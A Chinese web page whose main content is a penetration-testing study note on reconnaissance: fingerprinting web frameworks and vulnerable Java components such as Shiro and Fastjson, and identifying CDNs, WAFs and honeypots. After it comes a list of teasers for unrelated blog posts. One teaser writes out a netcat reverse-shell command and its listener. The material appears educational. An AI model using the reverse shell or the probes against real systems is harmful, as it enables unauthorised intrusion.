当前位置：首页 > news >正文

web安全学习笔记【16】——信息打点（6）

news 2025/9/3 2:36:14

信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等[1]

#知识点：

1、业务资产-应用类型分类

2、Web单域名获取-接口查询

3、Web子域名获取-解析枚举

4、Web架构资产-平台指纹识别

------------------------------------

1、开源-CMS指纹识别源码获取方式

2、闭源-习惯&配置&特性等获取方式

3、闭源-托管资产平台资源搜索监控

------------------------------------

1、JS前端架构-识别&分析

2、JS前端架构-开发框架分析

3、JS前端架构-打包器分析

4、JS前端架构-提取&FUZZ

解决：

1、如何从表现中的JS提取价值信息

2、如何从地址中FUZZ提取未知的JS文件

3、如何从JS开放框架WebPack进行测试

------------------------------------

1、端口扫描-应用&协议

2、WAF识别-分类&识别

3、蜜罐识别-分类&识别

解决：

1、Web服务器&应用服务器差异性

2、WAF防火墙&安全防护&识别技术

3、蜜罐平台&安全防护&识别技术

------------------------------------

1、CDN服务-解释差异识别

2、CDN绕过-配置差异导致

3、CDN绕过-主动连接获取

4、CDN绕过-全网扫描获取

解决：

1、CDN服务对安全影响

2、CDN服务绕过识别手法

------------------------------------

1、CMS指纹识别-不出网程序识别

2、开发框架识别-PHP&Python&Java

3、开发组件识别-Java常见安全漏洞组件

解决：

1、CMS识别到后期漏洞利用和代码审计

2、开发框架识别到后期漏洞利用和代码审计

3、开发组件识别到后期漏洞利用和代码审计

#章节点

Web：语言/CMS/中间件/数据库/系统/WAF等

系统：操作系统/端口服务/网络环境/防火墙等

应用：APP对象/API接口/微信小程序/PC应用等

架构：CDN/前后端/云应用/站库分离/OSS资源等

技术：JS爬虫/敏感扫描/端口扫描/源码获取/接口泄漏等

技术：指纹识别/Github监控/CDN绕过/WAF识别/蜜罐识别等

#补充：

CMS（主要针对php的 Java的可能不太行）

Discuz、WordPress、Ecshop、蝉知等

前端技术

HTML5、jquery、bootstrap、Vue等

开发语言

PHP、JAVA、Ruby、Python、C#，JS等

Web服务器

Apache、Nginx、IIS、lighttpd等

应用服务器：

Tomcat、Jboss、Weblogic、Websphere等

数据库类型：

Mysql、SqlServer、Oracle、Redis、MongoDB等

操作系统信息

Linux、windows等

应用服务信息：

FTP、SSH、RDP、SMB、SMTP、LDAP、Rsync等

CDN信息

帝联、Cloudflare、网宿、七牛云、阿里云等

WAF信息

创宇盾、宝塔、ModSecurity、玄武盾、OpenRASP等。

蜜罐信息：

HFish、TeaPot、T-Pot、Glastopf等

其他组件信息

fastjson、shiro、log4j、OA办公等

演示案例：

指纹识别-本地工具-GotoScan

GotoScan ：cms.json 里面有很多cms可以识别出来

Python-开发框架-Django&Flask

Flask：

PHP-开发框架-ThinkPHP&Laravel&Yii

thinkphp

源码还是使用的某个框架开发的

YII（还是有用某些框架开发的）

Laravel

yii

Java-框架组件-FastJson&Shiro&Solr&Spring

fastjson

shrio

struct

spring

后端：

CMS：一般PHP开发居多源码程序

（利用源码程序名去搜漏洞情况，源码去下载进行后期的代码审计）

前端

js 框架（爬取更多的js从里面筛选URL或敏感泄漏key等）

也是可以通过对js代码逻辑进行代码审计

组件：java居多，

常见有过安全漏洞组件（shiro solr log4j sprintboot等）

框架：php java python都有

框架：简单代码的一个整合库，如果使用框架就只需要学习使用框架调用即可

如：文件上传功能是需要很多代码来实现的，框架把这个代码进行封封装，调用即可

影响：如果采用框架开发，代码的安全性是取决于框架的过滤机制

组件：第三方的功能模块（日志记录，数据监控，数据转换等）

Web架构：

1、最简单最入门的开发模型（功能代码全部手写）

最容易出现漏洞，程序员水平不一，没有第三方或团队的检测，单纯的自己写

2、结合开发框架的开发模型（以框架为核心实现功能）

第三方或团队的开发的封装代码框架，一般内置的过滤机制（框架漏洞）

3、结合开发框架外加组件模型（以框架为核心，组件为辅实现功能）

第三方或团队的开发的封装代码框架，一般内置的过滤机制（框架和组件漏洞）

指纹识别-本地工具-GotoScan（CMSEEK）

1、在线平台见前面课程，本地工具适用于不出网环境

https://github.com/newbe3three/gotoscan

2、网络空间：Fofa Quake Hunter

3、网络空间：IO图标关系

#Python-开发框架-Django&Flask

Django

1、识别插件

2、Set-Cookie:expires=

Flask

1、识别插件

2、Set-Cookie:expires=

#PHP-开发框架-ThinkPHP&Laravel&Yii

ThinkPHP：

0、识别插件

1、X-Powered-By: ThinkPHP

2、CMS识别到源码体系TP开发

Laravel：

1、识别插件

2、Set-Cookie中特征的格式

Yii:

1、识别插件

2、Set-Cookie中特征的格式

#Java-框架组件-Fastjson&Shiro&Solr&Spring

52类110个主流Java组件和框架介绍：

https://blog.csdn.net/agonie201218/article/details/125300729

Fastjson/Jackson

在提交JSON数据包中修改测试：

-Fastjson组件会把01解析成1

-Jackson组件在解析01时会抛出异常

https://forum.butian.net/share/1679

https://www.iculture.cc/forum-post/24115.html

Shiro

请求包的cookie中存在rememberMe字段。

返回包中存在set-Cookie：remeberMe=deleteMe。

请求包中存在rememberMe=x时，响应包中存在rememberMe=deleteMe。

有时候服务器不会主动返回remeberMe=deleteMe，直接发包即可，将Cookie内容改为remember Me=1，若相应包有rememberMe=deleteMe，则基本可以确定网站apache shiro搭建的。

Struts2

一般使用struts2框架后缀带do或action，可以尝试进行利用

Springboot

1、通过web应用程序网页标签的小绿叶图标

2、通过springboot框架默认报错页面

Solr识别

一般开放8983端口,访问页面也可以探针到

web安全学习笔记【16】——信息打点（6）

信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等[1] #知识点： 1、业务资产-应用类型分类 2、Web单域名获取-接口查询 3、Web子域名获取-解析枚举 4、Web架构资产-平台指纹识别 ------------------------------------ 1、开源-C…...

编程日记 2024/2/25 6:50:29

145.二叉树的后序遍历

// 定义一个名为Solution的类，用于解决二叉树的后序遍历问题 class Solution { // 定义一个公共方法，输入是一个二叉树的根节点，返回一个包含后序遍历结果的整数列表 public List<Integer> postorderTraversal(TreeNode root) { /…...

编程日记 2024/2/25 6:49:28

ssh远程连接免密码访问

我们在远程登录的时候，经常需要输入密码，密码往往比较复杂，输入比较耗费时间，这种情况下可以使用ssh免密码登录。一般的教程是需要生成ssh密钥后，然后把密钥复制到server端完成配置，这里提供一个简单的方…...

编程日记 2024/2/25 6:48:27

Vue-Json-Schema-Form: 如何基于模板定制前端页面

本人从事的是工业物联网，面对工业设备的通讯难题是各大设备都有各自的通讯协议，如果想要用一款硬件去和所有设备做通讯的话，就得面对怎么把自己想要采集的配置下发给自己的采集器的问题，以前都是采用各种模型去尝试构建配置项，但是因为配置可能会有深层次嵌套，而且…...

编程日记 2024/2/25 6:43:22

保存Json对象到数据库

文章目录背景实现方式1. 直接以 Json 对象保存到数据库2. 以 String 类型保存到数据库背景项目过程中可能需要保存 Json 对象到数据库中。实现方式有两种实现方式，一种是直接保存 Json 对象到数据库，这种方式在创建实体类以及编写 Mapper XML 脚本…...

编程日记 2024/2/25 6:40:20

《Docker 简易速速上手小册》第3章 Dockerfile 与镜像构建（2024 最新版）

文章目录 3.1 编写 Dockerfile3.1.1 重点基础知识3.1.2 重点案例：创建简单 Python 应用的 Docker 镜像3.1.3 拓展案例 1：Dockerfile 优化3.1.4 拓展案例 2：多阶段构建 3.2 构建流程深入解析3.2.1 重点基础知识3.2.2 重点案例：构建…...

编程日记 2024/2/25 6:38:18

【Python笔记-设计模式】适配器模式

一、说明适配器模式是一种结构型模式，它使接口不兼容的对象能够相互合作 (一) 解决问题主要解决接口不兼容问题 (二) 使用场景当系统需要使用现有的类，但类的接口不符合需求时当需要一个统一的输出接口，但输入类型不可预知时当需要创…...

编程日记 2024/2/25 6:31:12

二分算法（c++版）

二分的本质是什么？ 很多人会认为单调性是二分的本质，但其实其本质并非单调性，只是说，有单调性的可以进行二分，但是有些题目没有单调性我们也可以进行二分。其本质其实是一个边界问题，给定一个条件&#xf…...

编程日记 2024/2/25 6:29:09

【C#】用于基于 UV DLP 的 3D 打印机的切片软件源码解析（一）DLP原理 GUI

0. 原理基于 UV DLP 的 3D 打印机的工作原理是这样的： UV DLP 是一种使用数字光处理（Digital Light Processing）技术的 3D 打印方法，它利用紫外光（UV）来固化液态树脂，从而形成实体物体。UV DLP…...

编程日记 2024/2/25 6:27:07

Javase补充-Arrays类的常用方法汇总

文章目录一 . 排序方法二 . 查找方法三 . 判断是否相等的方法四 . 拷贝方法五 . 填充方法一 . 排序方法我们第一个要介绍的就是sort方法这个排序实现的底层逻辑应该是十分复杂的,以我们目前的水平体系应该无法理解,我们今天尝试用我们可以理解的一种排序算法,插入排序来模…...

编程日记 2024/2/25 6:26:06

微信小程序-人脸检测-眨眼驱动ESP32蓝牙设备灯

前面2篇文章已经写了具体的人脸检测和蓝牙这里直接结合，只列js 代码，剩下的其他代码在另外文章里面 https://blog.csdn.net/walle167/article/details/136261993 https://blog.csdn.net/walle167/article/details/136261919 上代码 import bleBehavior …...

编程日记 2024/2/25 6:25:05

怎么在wifi中实现手机和电脑文件互传

有时我们想手机电脑文件互传，数据线却不在身边，这时我们可以用MiXplorer来实现wifi中手机和电脑互相访问文件。 MiXplorer是一款来自著名安卓开发者论坛XDA的作品，免费且功能强大，被很多人誉为是“全能文件管理器”。 1.在手机上…...

编程日记 2024/2/25 6:22:02

07 STL 简介

目录什么是STLSTL的版本STL的六大组件STL的重要性如何学习STLSTL的缺陷 1. 什么是STL c标准库的重要组成部分，不仅是一个可复用的组件库，而且是一个包罗数据结构和算法的软件框架 2. STL的版本原始版本 Alexander Stepanov、Meng Lee在惠普实验室的…...

编程日记 2024/2/25 6:20:00

unity学习（39）——创建（create）角色脚本（panel）——静态（static）

1.发现一个非常实用的功能，点击unity中console的输出项，可以直接跳转到vs的代码页！ 2.static类（变量）有三个特点： （1）独一份（2）无法实例化。（3&…...

编程日记 2024/2/25 6:18:59

MacOS环境下用powerline配置Terminal终端

Powerline 简介及安装配置 Powerline 是一个 stateless 状态栏，也就是一个全局状态/提示栏。你可以将其配置到你的 bash、Terminal、iTerm2 或 VIM 中，效果会如下所示： 你的 Mac 终端提示栏将会呈现如下图所示： 你的 VIM 状态…...

编程日记 2024/2/25 6:17:58

liunx单机项目部署

文章目录 1.liunx简介2.liunx的jdk安装2.liunx的tomcat安装3.liunx的mysql安装4.单机项目部署 1.liunx简介 Linux，一般指GNU/Linux（单独的Linux内核并不可直接使用，一般搭配GNU套件，故得此称呼），是一种免费…...

编程日记 2024/2/25 6:16:57

SQL 中如何实现多表关联查询？

阅读本文之前请参阅----MySQL 数据库安装教程详解（linux系统和windows系统） 在SQL中，多表关联查询是通过使用JOIN操作来实现的，它允许你从两个或多个表中根据相关列的值来检索数据。以下是几种常见的JOIN类型： …...

编程日记 2024/2/25 6:14:54

oracle 设置权限禁止删除用户

在Oracle中，可以通过修改系统角色来控制用户的操作权限。要禁止删除用户，需要将DROP USER这个特定的系统权限从相应的角色中移除。下面是一种常见的方法，使用SQL语句进行操作： -- 创建新的角色，并为其分配所有必要的…...

编程日记 2024/2/25 6:13:53

港科夜闻｜香港科大计划建立北部都会区卫星校园完善科大创新带,发展未来创新科技未来医药发展及跨学科教育...

关注并星标每周阅读港科夜闻建立新视野开启新思维 1、香港科大计划建立北部都会区卫星校园完善“科大创新带”，发展未来创新科技、未来医药发展及跨学科教育。香港科大校长叶玉如教授在2月22日的媒体会议上表示，香港科大将在北部都会区建立卫星校园&a…...

编程日记 2024/2/25 6:10:50

linux反弹shell简单使用

一、反弹shell（NC正向反弹） 1、靶机开启监听端口格式： nc -lvvp [任意未占用的端口号] 例： nc -lvvp [8080] 2、攻击机将shell弹到靶机上格式： nc -e /bin/bash [靶机ip] [靶机监听端口] 例： nc -e /bin…...

编程日记 2024/2/25 6:09:49

Flask RESTful 示例

目录 1. 环境准备2. 安装依赖3. 修改main.py4. 运行应用5. API使用示例获取所有任务获取单个任务创建新任务更新任务删除任务中文乱码问题： 下面创建一个简单的Flask RESTful API示例。首先，我们需要创建环境，安装必要的依赖，然后…...

编程新知 2025/9/2 17:00:04

FFmpeg 低延迟同屏方案

引言在实时互动需求激增的当下，无论是在线教育中的师生同屏演示、远程办公的屏幕共享协作，还是游戏直播的画面实时传输，低延迟同屏已成为保障用户体验的核心指标。FFmpeg 作为一款功能强大的多媒体框架，凭借其灵活的编解码、数据…...

编程新知 2025/6/21 15:38:27

Swift 协议扩展精进之路：解决 CoreData 托管实体子类的类型不匹配问题（下）

概述在 Swift 开发语言中，各位秃头小码农们可以充分利用语法本身所带来的便利去劈荆斩棘。我们还可以恣意利用泛型、协议关联类型和协议扩展来进一步简化和优化我们复杂的代码需求。不过，在涉及到多个子类派生于基类进行多态模拟的场景下，…...

编程新知 2025/8/22 3:51:49

微信小程序 - 手机震动

一、界面 <button type"primary" bindtap"shortVibrate">短震动</button> <button type"primary" bindtap"longVibrate">长震动</button> 二、js逻辑代码注：文档 https://developers.weixin.qq…...

编程新知 2025/8/25 23:31:15

【算法训练营Day07】字符串part1

文章目录反转字符串反转字符串II替换数字反转字符串题目链接：344. 反转字符串双指针法，两个指针的元素直接调转即可 class Solution {public void reverseString(char[] s) {int head 0;int end s.length - 1;while(head < end) {char temp …...

编程新知 2025/8/27 14:38:58